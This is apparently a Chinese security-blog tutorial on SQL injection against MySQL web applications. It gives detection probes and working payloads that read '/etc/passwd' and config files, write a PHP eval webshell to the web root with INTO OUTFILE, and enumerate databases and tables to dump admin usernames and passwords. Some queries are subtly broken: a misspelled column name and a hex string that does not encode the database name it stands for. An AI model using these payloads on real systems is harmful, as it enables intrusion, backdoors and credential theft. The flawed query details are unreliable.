• 欢迎访问行云博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入行云博客 QQ群
  • 本站广招各类优秀作者,详情可以加群联系
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏行云博客吧

SQL注入详谈

web渗透 行云 6个月前 (04-12) 278次浏览 已收录 0个评论 扫描二维码

简介

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

原理

针对 SQL 注入的攻击行为可描述为通过用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。

其成因可以归结以下两个原因叠加造成的:

1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句

2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中。

注入危害

攻击者利用 SQL 注入漏洞,可以获取数据库中的多种信息(例如:管理员后台密码),从而脱取数据库中内容(脱库)。在特别情况下,还可以修改数据库内容或者插入内容到数据库,如果数据库权限分配存在问题,或者数据库本身存在缺陷,那么攻击者可以通过 SQL 注入漏洞直接获取 webshell 或者服务器系统权限。

注入分类

1.根据数据类型

  • 数字型注入
  • 字符型注入

区别:

字符型:需要单引号闭合的就是字符型注入,并且需要注释掉后面的单引号 (注释符号:#,– – ,/*)

数值型:不需要单引号闭合,也不需要注释符号

根据注入语法

  • UNION query SQL injection(可联合查询注入)
  • Stacked queries SQL injection(可多语句查询注入)
  • Error-based SQL injection(报错型注入)
  • Boolean-based blind SQL injection(布尔型注入)
  • Time-based blind SQL injection(基于时间延迟注入)

SQL 注入挖掘

  • and 1=1 和 and 1=2 回显页面不同(整形判断)
  • 单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断)
  • (转义符)
  • -1/+1 回显下一个或上一个页面(整型判断)(需要用%2b 转码+号)
  • and sleep(5) (判断页面返回时间)

MySQL 中常用函数

  • system_user() 系统用户名
  • user() 数据库的用户名
  • current_user() 当前用户名
  • session_user() 连接数据库的用户名
  • database() 数据库名
  • version() MYSQL 数据库版本
  • @@basedir 查看安装路径
  • load_file(‘/etc/passwd’) MYSQL 读取本地文件的函数

MySQL 中 information_scheme 库

  • SCHEMATA 表 字段:SCHEMA_NAME (数据库名字)
  • TABLES 表 字段:TABLE_SCHEMA, TABLE_NAME
  • COLUMNS 表 字段:TBALE_SCHEMA,TABLE_NAME,COLUMN_NAME

load_file( )函数 读文件操作

前提:

  • 知道文件绝对路径
  • 能够使用 union 查询
  • 对 web 目录有读写权限
1
2
3
UNION SELECT 1,load_file('/etc/passwd'),3,4,5,6#
UNION SELECT 1,load_file('D://phpStudy//WWW//conn.php'),3,4,5,6
UNION SELECT 1,load_file(0x443A2F2F70687053747564792F2F5757572F2F636F6E6E2E706870),3,4,5,6

into outfile( )写文件操作

前提:

  • 文件名必须全路径(绝对路径),
  • 用户必须有写文件的权限
  • 没有对 ‘ 单引号过滤
1
SELECT '<?php eval($_POST[1]); ?>' INTO OUTFILE ' D://phpStudy//WWW//hack.php '

MySQL 中 UNION 规则

  • UNION 必须由两条或两条以上的 SELECT 语句组成,语句之间用关键字 UNION 分隔
  • UNION 中的每个查询必须包含相同的列。
  • UNION 会从查询结果集中自动去除了重复行。

对以上知识有所了解之后我们就可以学习一些在SQL注入时常用的一些操作

1.判断字段数

挖掘出注入点之后我们可以通过 order by 来判断表的字段数

例如: http://www.xxx.com/test.php?id=6 order by n

注:通常使用“order by N”,通过不断变换N的值,至刚好返回正常的网页,可得到当前表的字段数

2.判断显示位

http://www.xxx.com/test.php?id=6 union select 1,2,3,4,5,6

3.获取当数据库名称和当前连接数据库的用户

http://www.xxx.com/test.php?id=-1 union select 1,2,database(),4,5,6

http://www.xxx.com/test.php?id=-1 union select 1,2,user(),4,5,6

4.列出所有数据库

limit 一个一个打印出来库名

select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1

group_concat 一次性全部显示

select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA

5.列出(数据库:xss)中所有的表

limit 一个一个打印出来字段名 schema

select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=’xss’ limit 0,1

group_concat 一次性全部显示

select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374

注意:数据库名称可以用十六进制来代替字符串,这样可以绕过单引号的限制。

6.列出(数据库:xss 表:admins )中所有的字段

limit 一个一个打印出来

select COLIMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA=’xss’ and

TABLENAME=’admins ‘ limit 0,1

group_concat 一次性全部显示

select group_concat(COLUMN_NAME) from information_schema.COLUMNS where

TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e

7.列出(数据库:xss 表:admins )中的数据

limit 一个一个打印出来

select username,passwd from xss.admins limit 0,1

group_concat 把 一次性全部打印

select group_concat(concat(username,0x20,passwd)) from xss.admins



行云博客 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!

本文链接:https://www.xy586.top/7539.html

转载请注明文章来源:行云博客 » SQL注入详谈

喜欢 (1)
[行云博客]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址